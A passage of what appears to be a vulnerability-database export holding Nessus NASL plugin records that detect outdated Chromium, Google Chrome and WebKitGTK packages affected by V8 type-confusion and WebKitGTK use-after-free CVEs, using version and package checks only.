'107.0.5304.87-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:56", "description": "The version of Google Chrome installed on the remote Windows host is prior to 107.0.5304.87/.88. It is, therefore, affected by a vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-27T00:00:00", "type": "nessus", "title": "Google Chrome < 107.0.5304.87/.88 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-09-21T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_107_0_5304_87.NASL", "href": "https://www.tenable.com/plugins/nessus/166631", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166631);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/21\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Google Chrome < 107.0.5304.87/.88 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 107.0.5304.87/.88. It is, therefore,\naffected by a vulnerability as referenced in the 2022_10_stable-channel-update-for-desktop_27 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88b3eec6\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1378239\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 107.0.5304.87 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'107.0.5304.87', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:55:58", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 1225c888-56ea-11ed-b5c3-3065ec8fd3ec advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-28T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- Type confusion in V8 (1225c888-56ea-11ed-b5c3-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ungoogled-chromium", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_1225C88856EA11EDB5C33065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/166701", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166701);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"FreeBSD : chromium -- Type confusion in V8 (1225c888-56ea-11ed-b5c3-3065ec8fd3ec)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 1225c888-56ea-11ed-b5c3-3065ec8fd3ec advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88b3eec6\");\n # https://vuxml.freebsd.org/freebsd/1225c888-56ea-11ed-b5c3-3065ec8fd3ec.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?129bfb6c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ungoogled-chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'chromium<107.0.5304.87',\n 'ungoogled-chromium<107.0.5304.87'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:06:10", "description": "The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5121 advisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-19T00:00:00", "type": "nessus", "title": "Debian DSA-5121-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-1364"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5121.NASL", "href": "https://www.tenable.com/plugins/nessus/159898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5121. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159898);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2022-1364\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/06\");\n script_xref(name:\"IAVA\", value:\"2022-A-0156-S\");\n\n script_name(english:\"Debian DSA-5121-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5121\nadvisory.\n\n - Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-1364)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5121\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-1364\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 100.0.4896.127-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-1364\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! preg(pattern:\"^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '100.0.4896.127-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '100.0.4896.127-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-08T13:31:32", "description": "The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the ELSA-2023-3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-05-24T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : webkit2gtk3 (ELSA-2023-3108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-29T00:00:00", "cpe": ["cpe:/o:oracle:linux:8", "p-cpe:/a:oracle:linux:webkit2gtk3", "p-cpe:/a:oracle:linux:webkit2gtk3-devel", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc", "p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel"], "id": "ORACLELINUX_ELSA-2023-3108.NASL", "href": "https://www.tenable.com/plugins/nessus/176307", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2023-3108.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(176307);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/29\");\n\n script_cve_id(\"CVE-2023-2203\");\n\n script_name(english:\"Oracle Linux 8 : webkit2gtk3 (ELSA-2023-3108)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 8 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2023-3108 advisory.\n\n - A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free\n vulnerability. This flaw allows attackers with network access to pass specially crafted web content files,\n causing a denial of service or arbitrary code execution. This CVE exists because of a CVE-2023-28205\n security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux\n 9.2. (CVE-2023-2203)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2023-3108.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2203\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/05/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkit2gtk3-jsc-devel\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(os_release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:os_release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 8', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-devel-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'webkit2gtk3-jsc-devel-2.38.5-1.el8_8.3', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release) {\n if (exists_check) {\n if (rpm_exists(release:_release, rpm:exists_check) && rpm_check(release:_release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkit2gtk3 / webkit2gtk3-devel / webkit2gtk3-jsc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-17T12:57:12", "description": "The version of Google Chrome installed on the remote macOS host is prior to 108.0.5359.94. It is, therefore, affected by a vulnerability as referenced in the 2022_12_stable-channel-update-for-desktop advisory.\n\n - Type Confusion in V8. (CVE-2022-4262)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-02T00:00:00", "type": "nessus", "title": "Google Chrome < 108.0.5359.94 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2023-09-20T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_108_0_5359_94.NASL", "href": "https://www.tenable.com/plugins/nessus/168373", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168373);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-4262\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/12/26\");\n script_xref(name:\"IAVA\", value:\"2022-A-0507-S\");\n\n script_name(english:\"Google Chrome < 108.0.5359.94 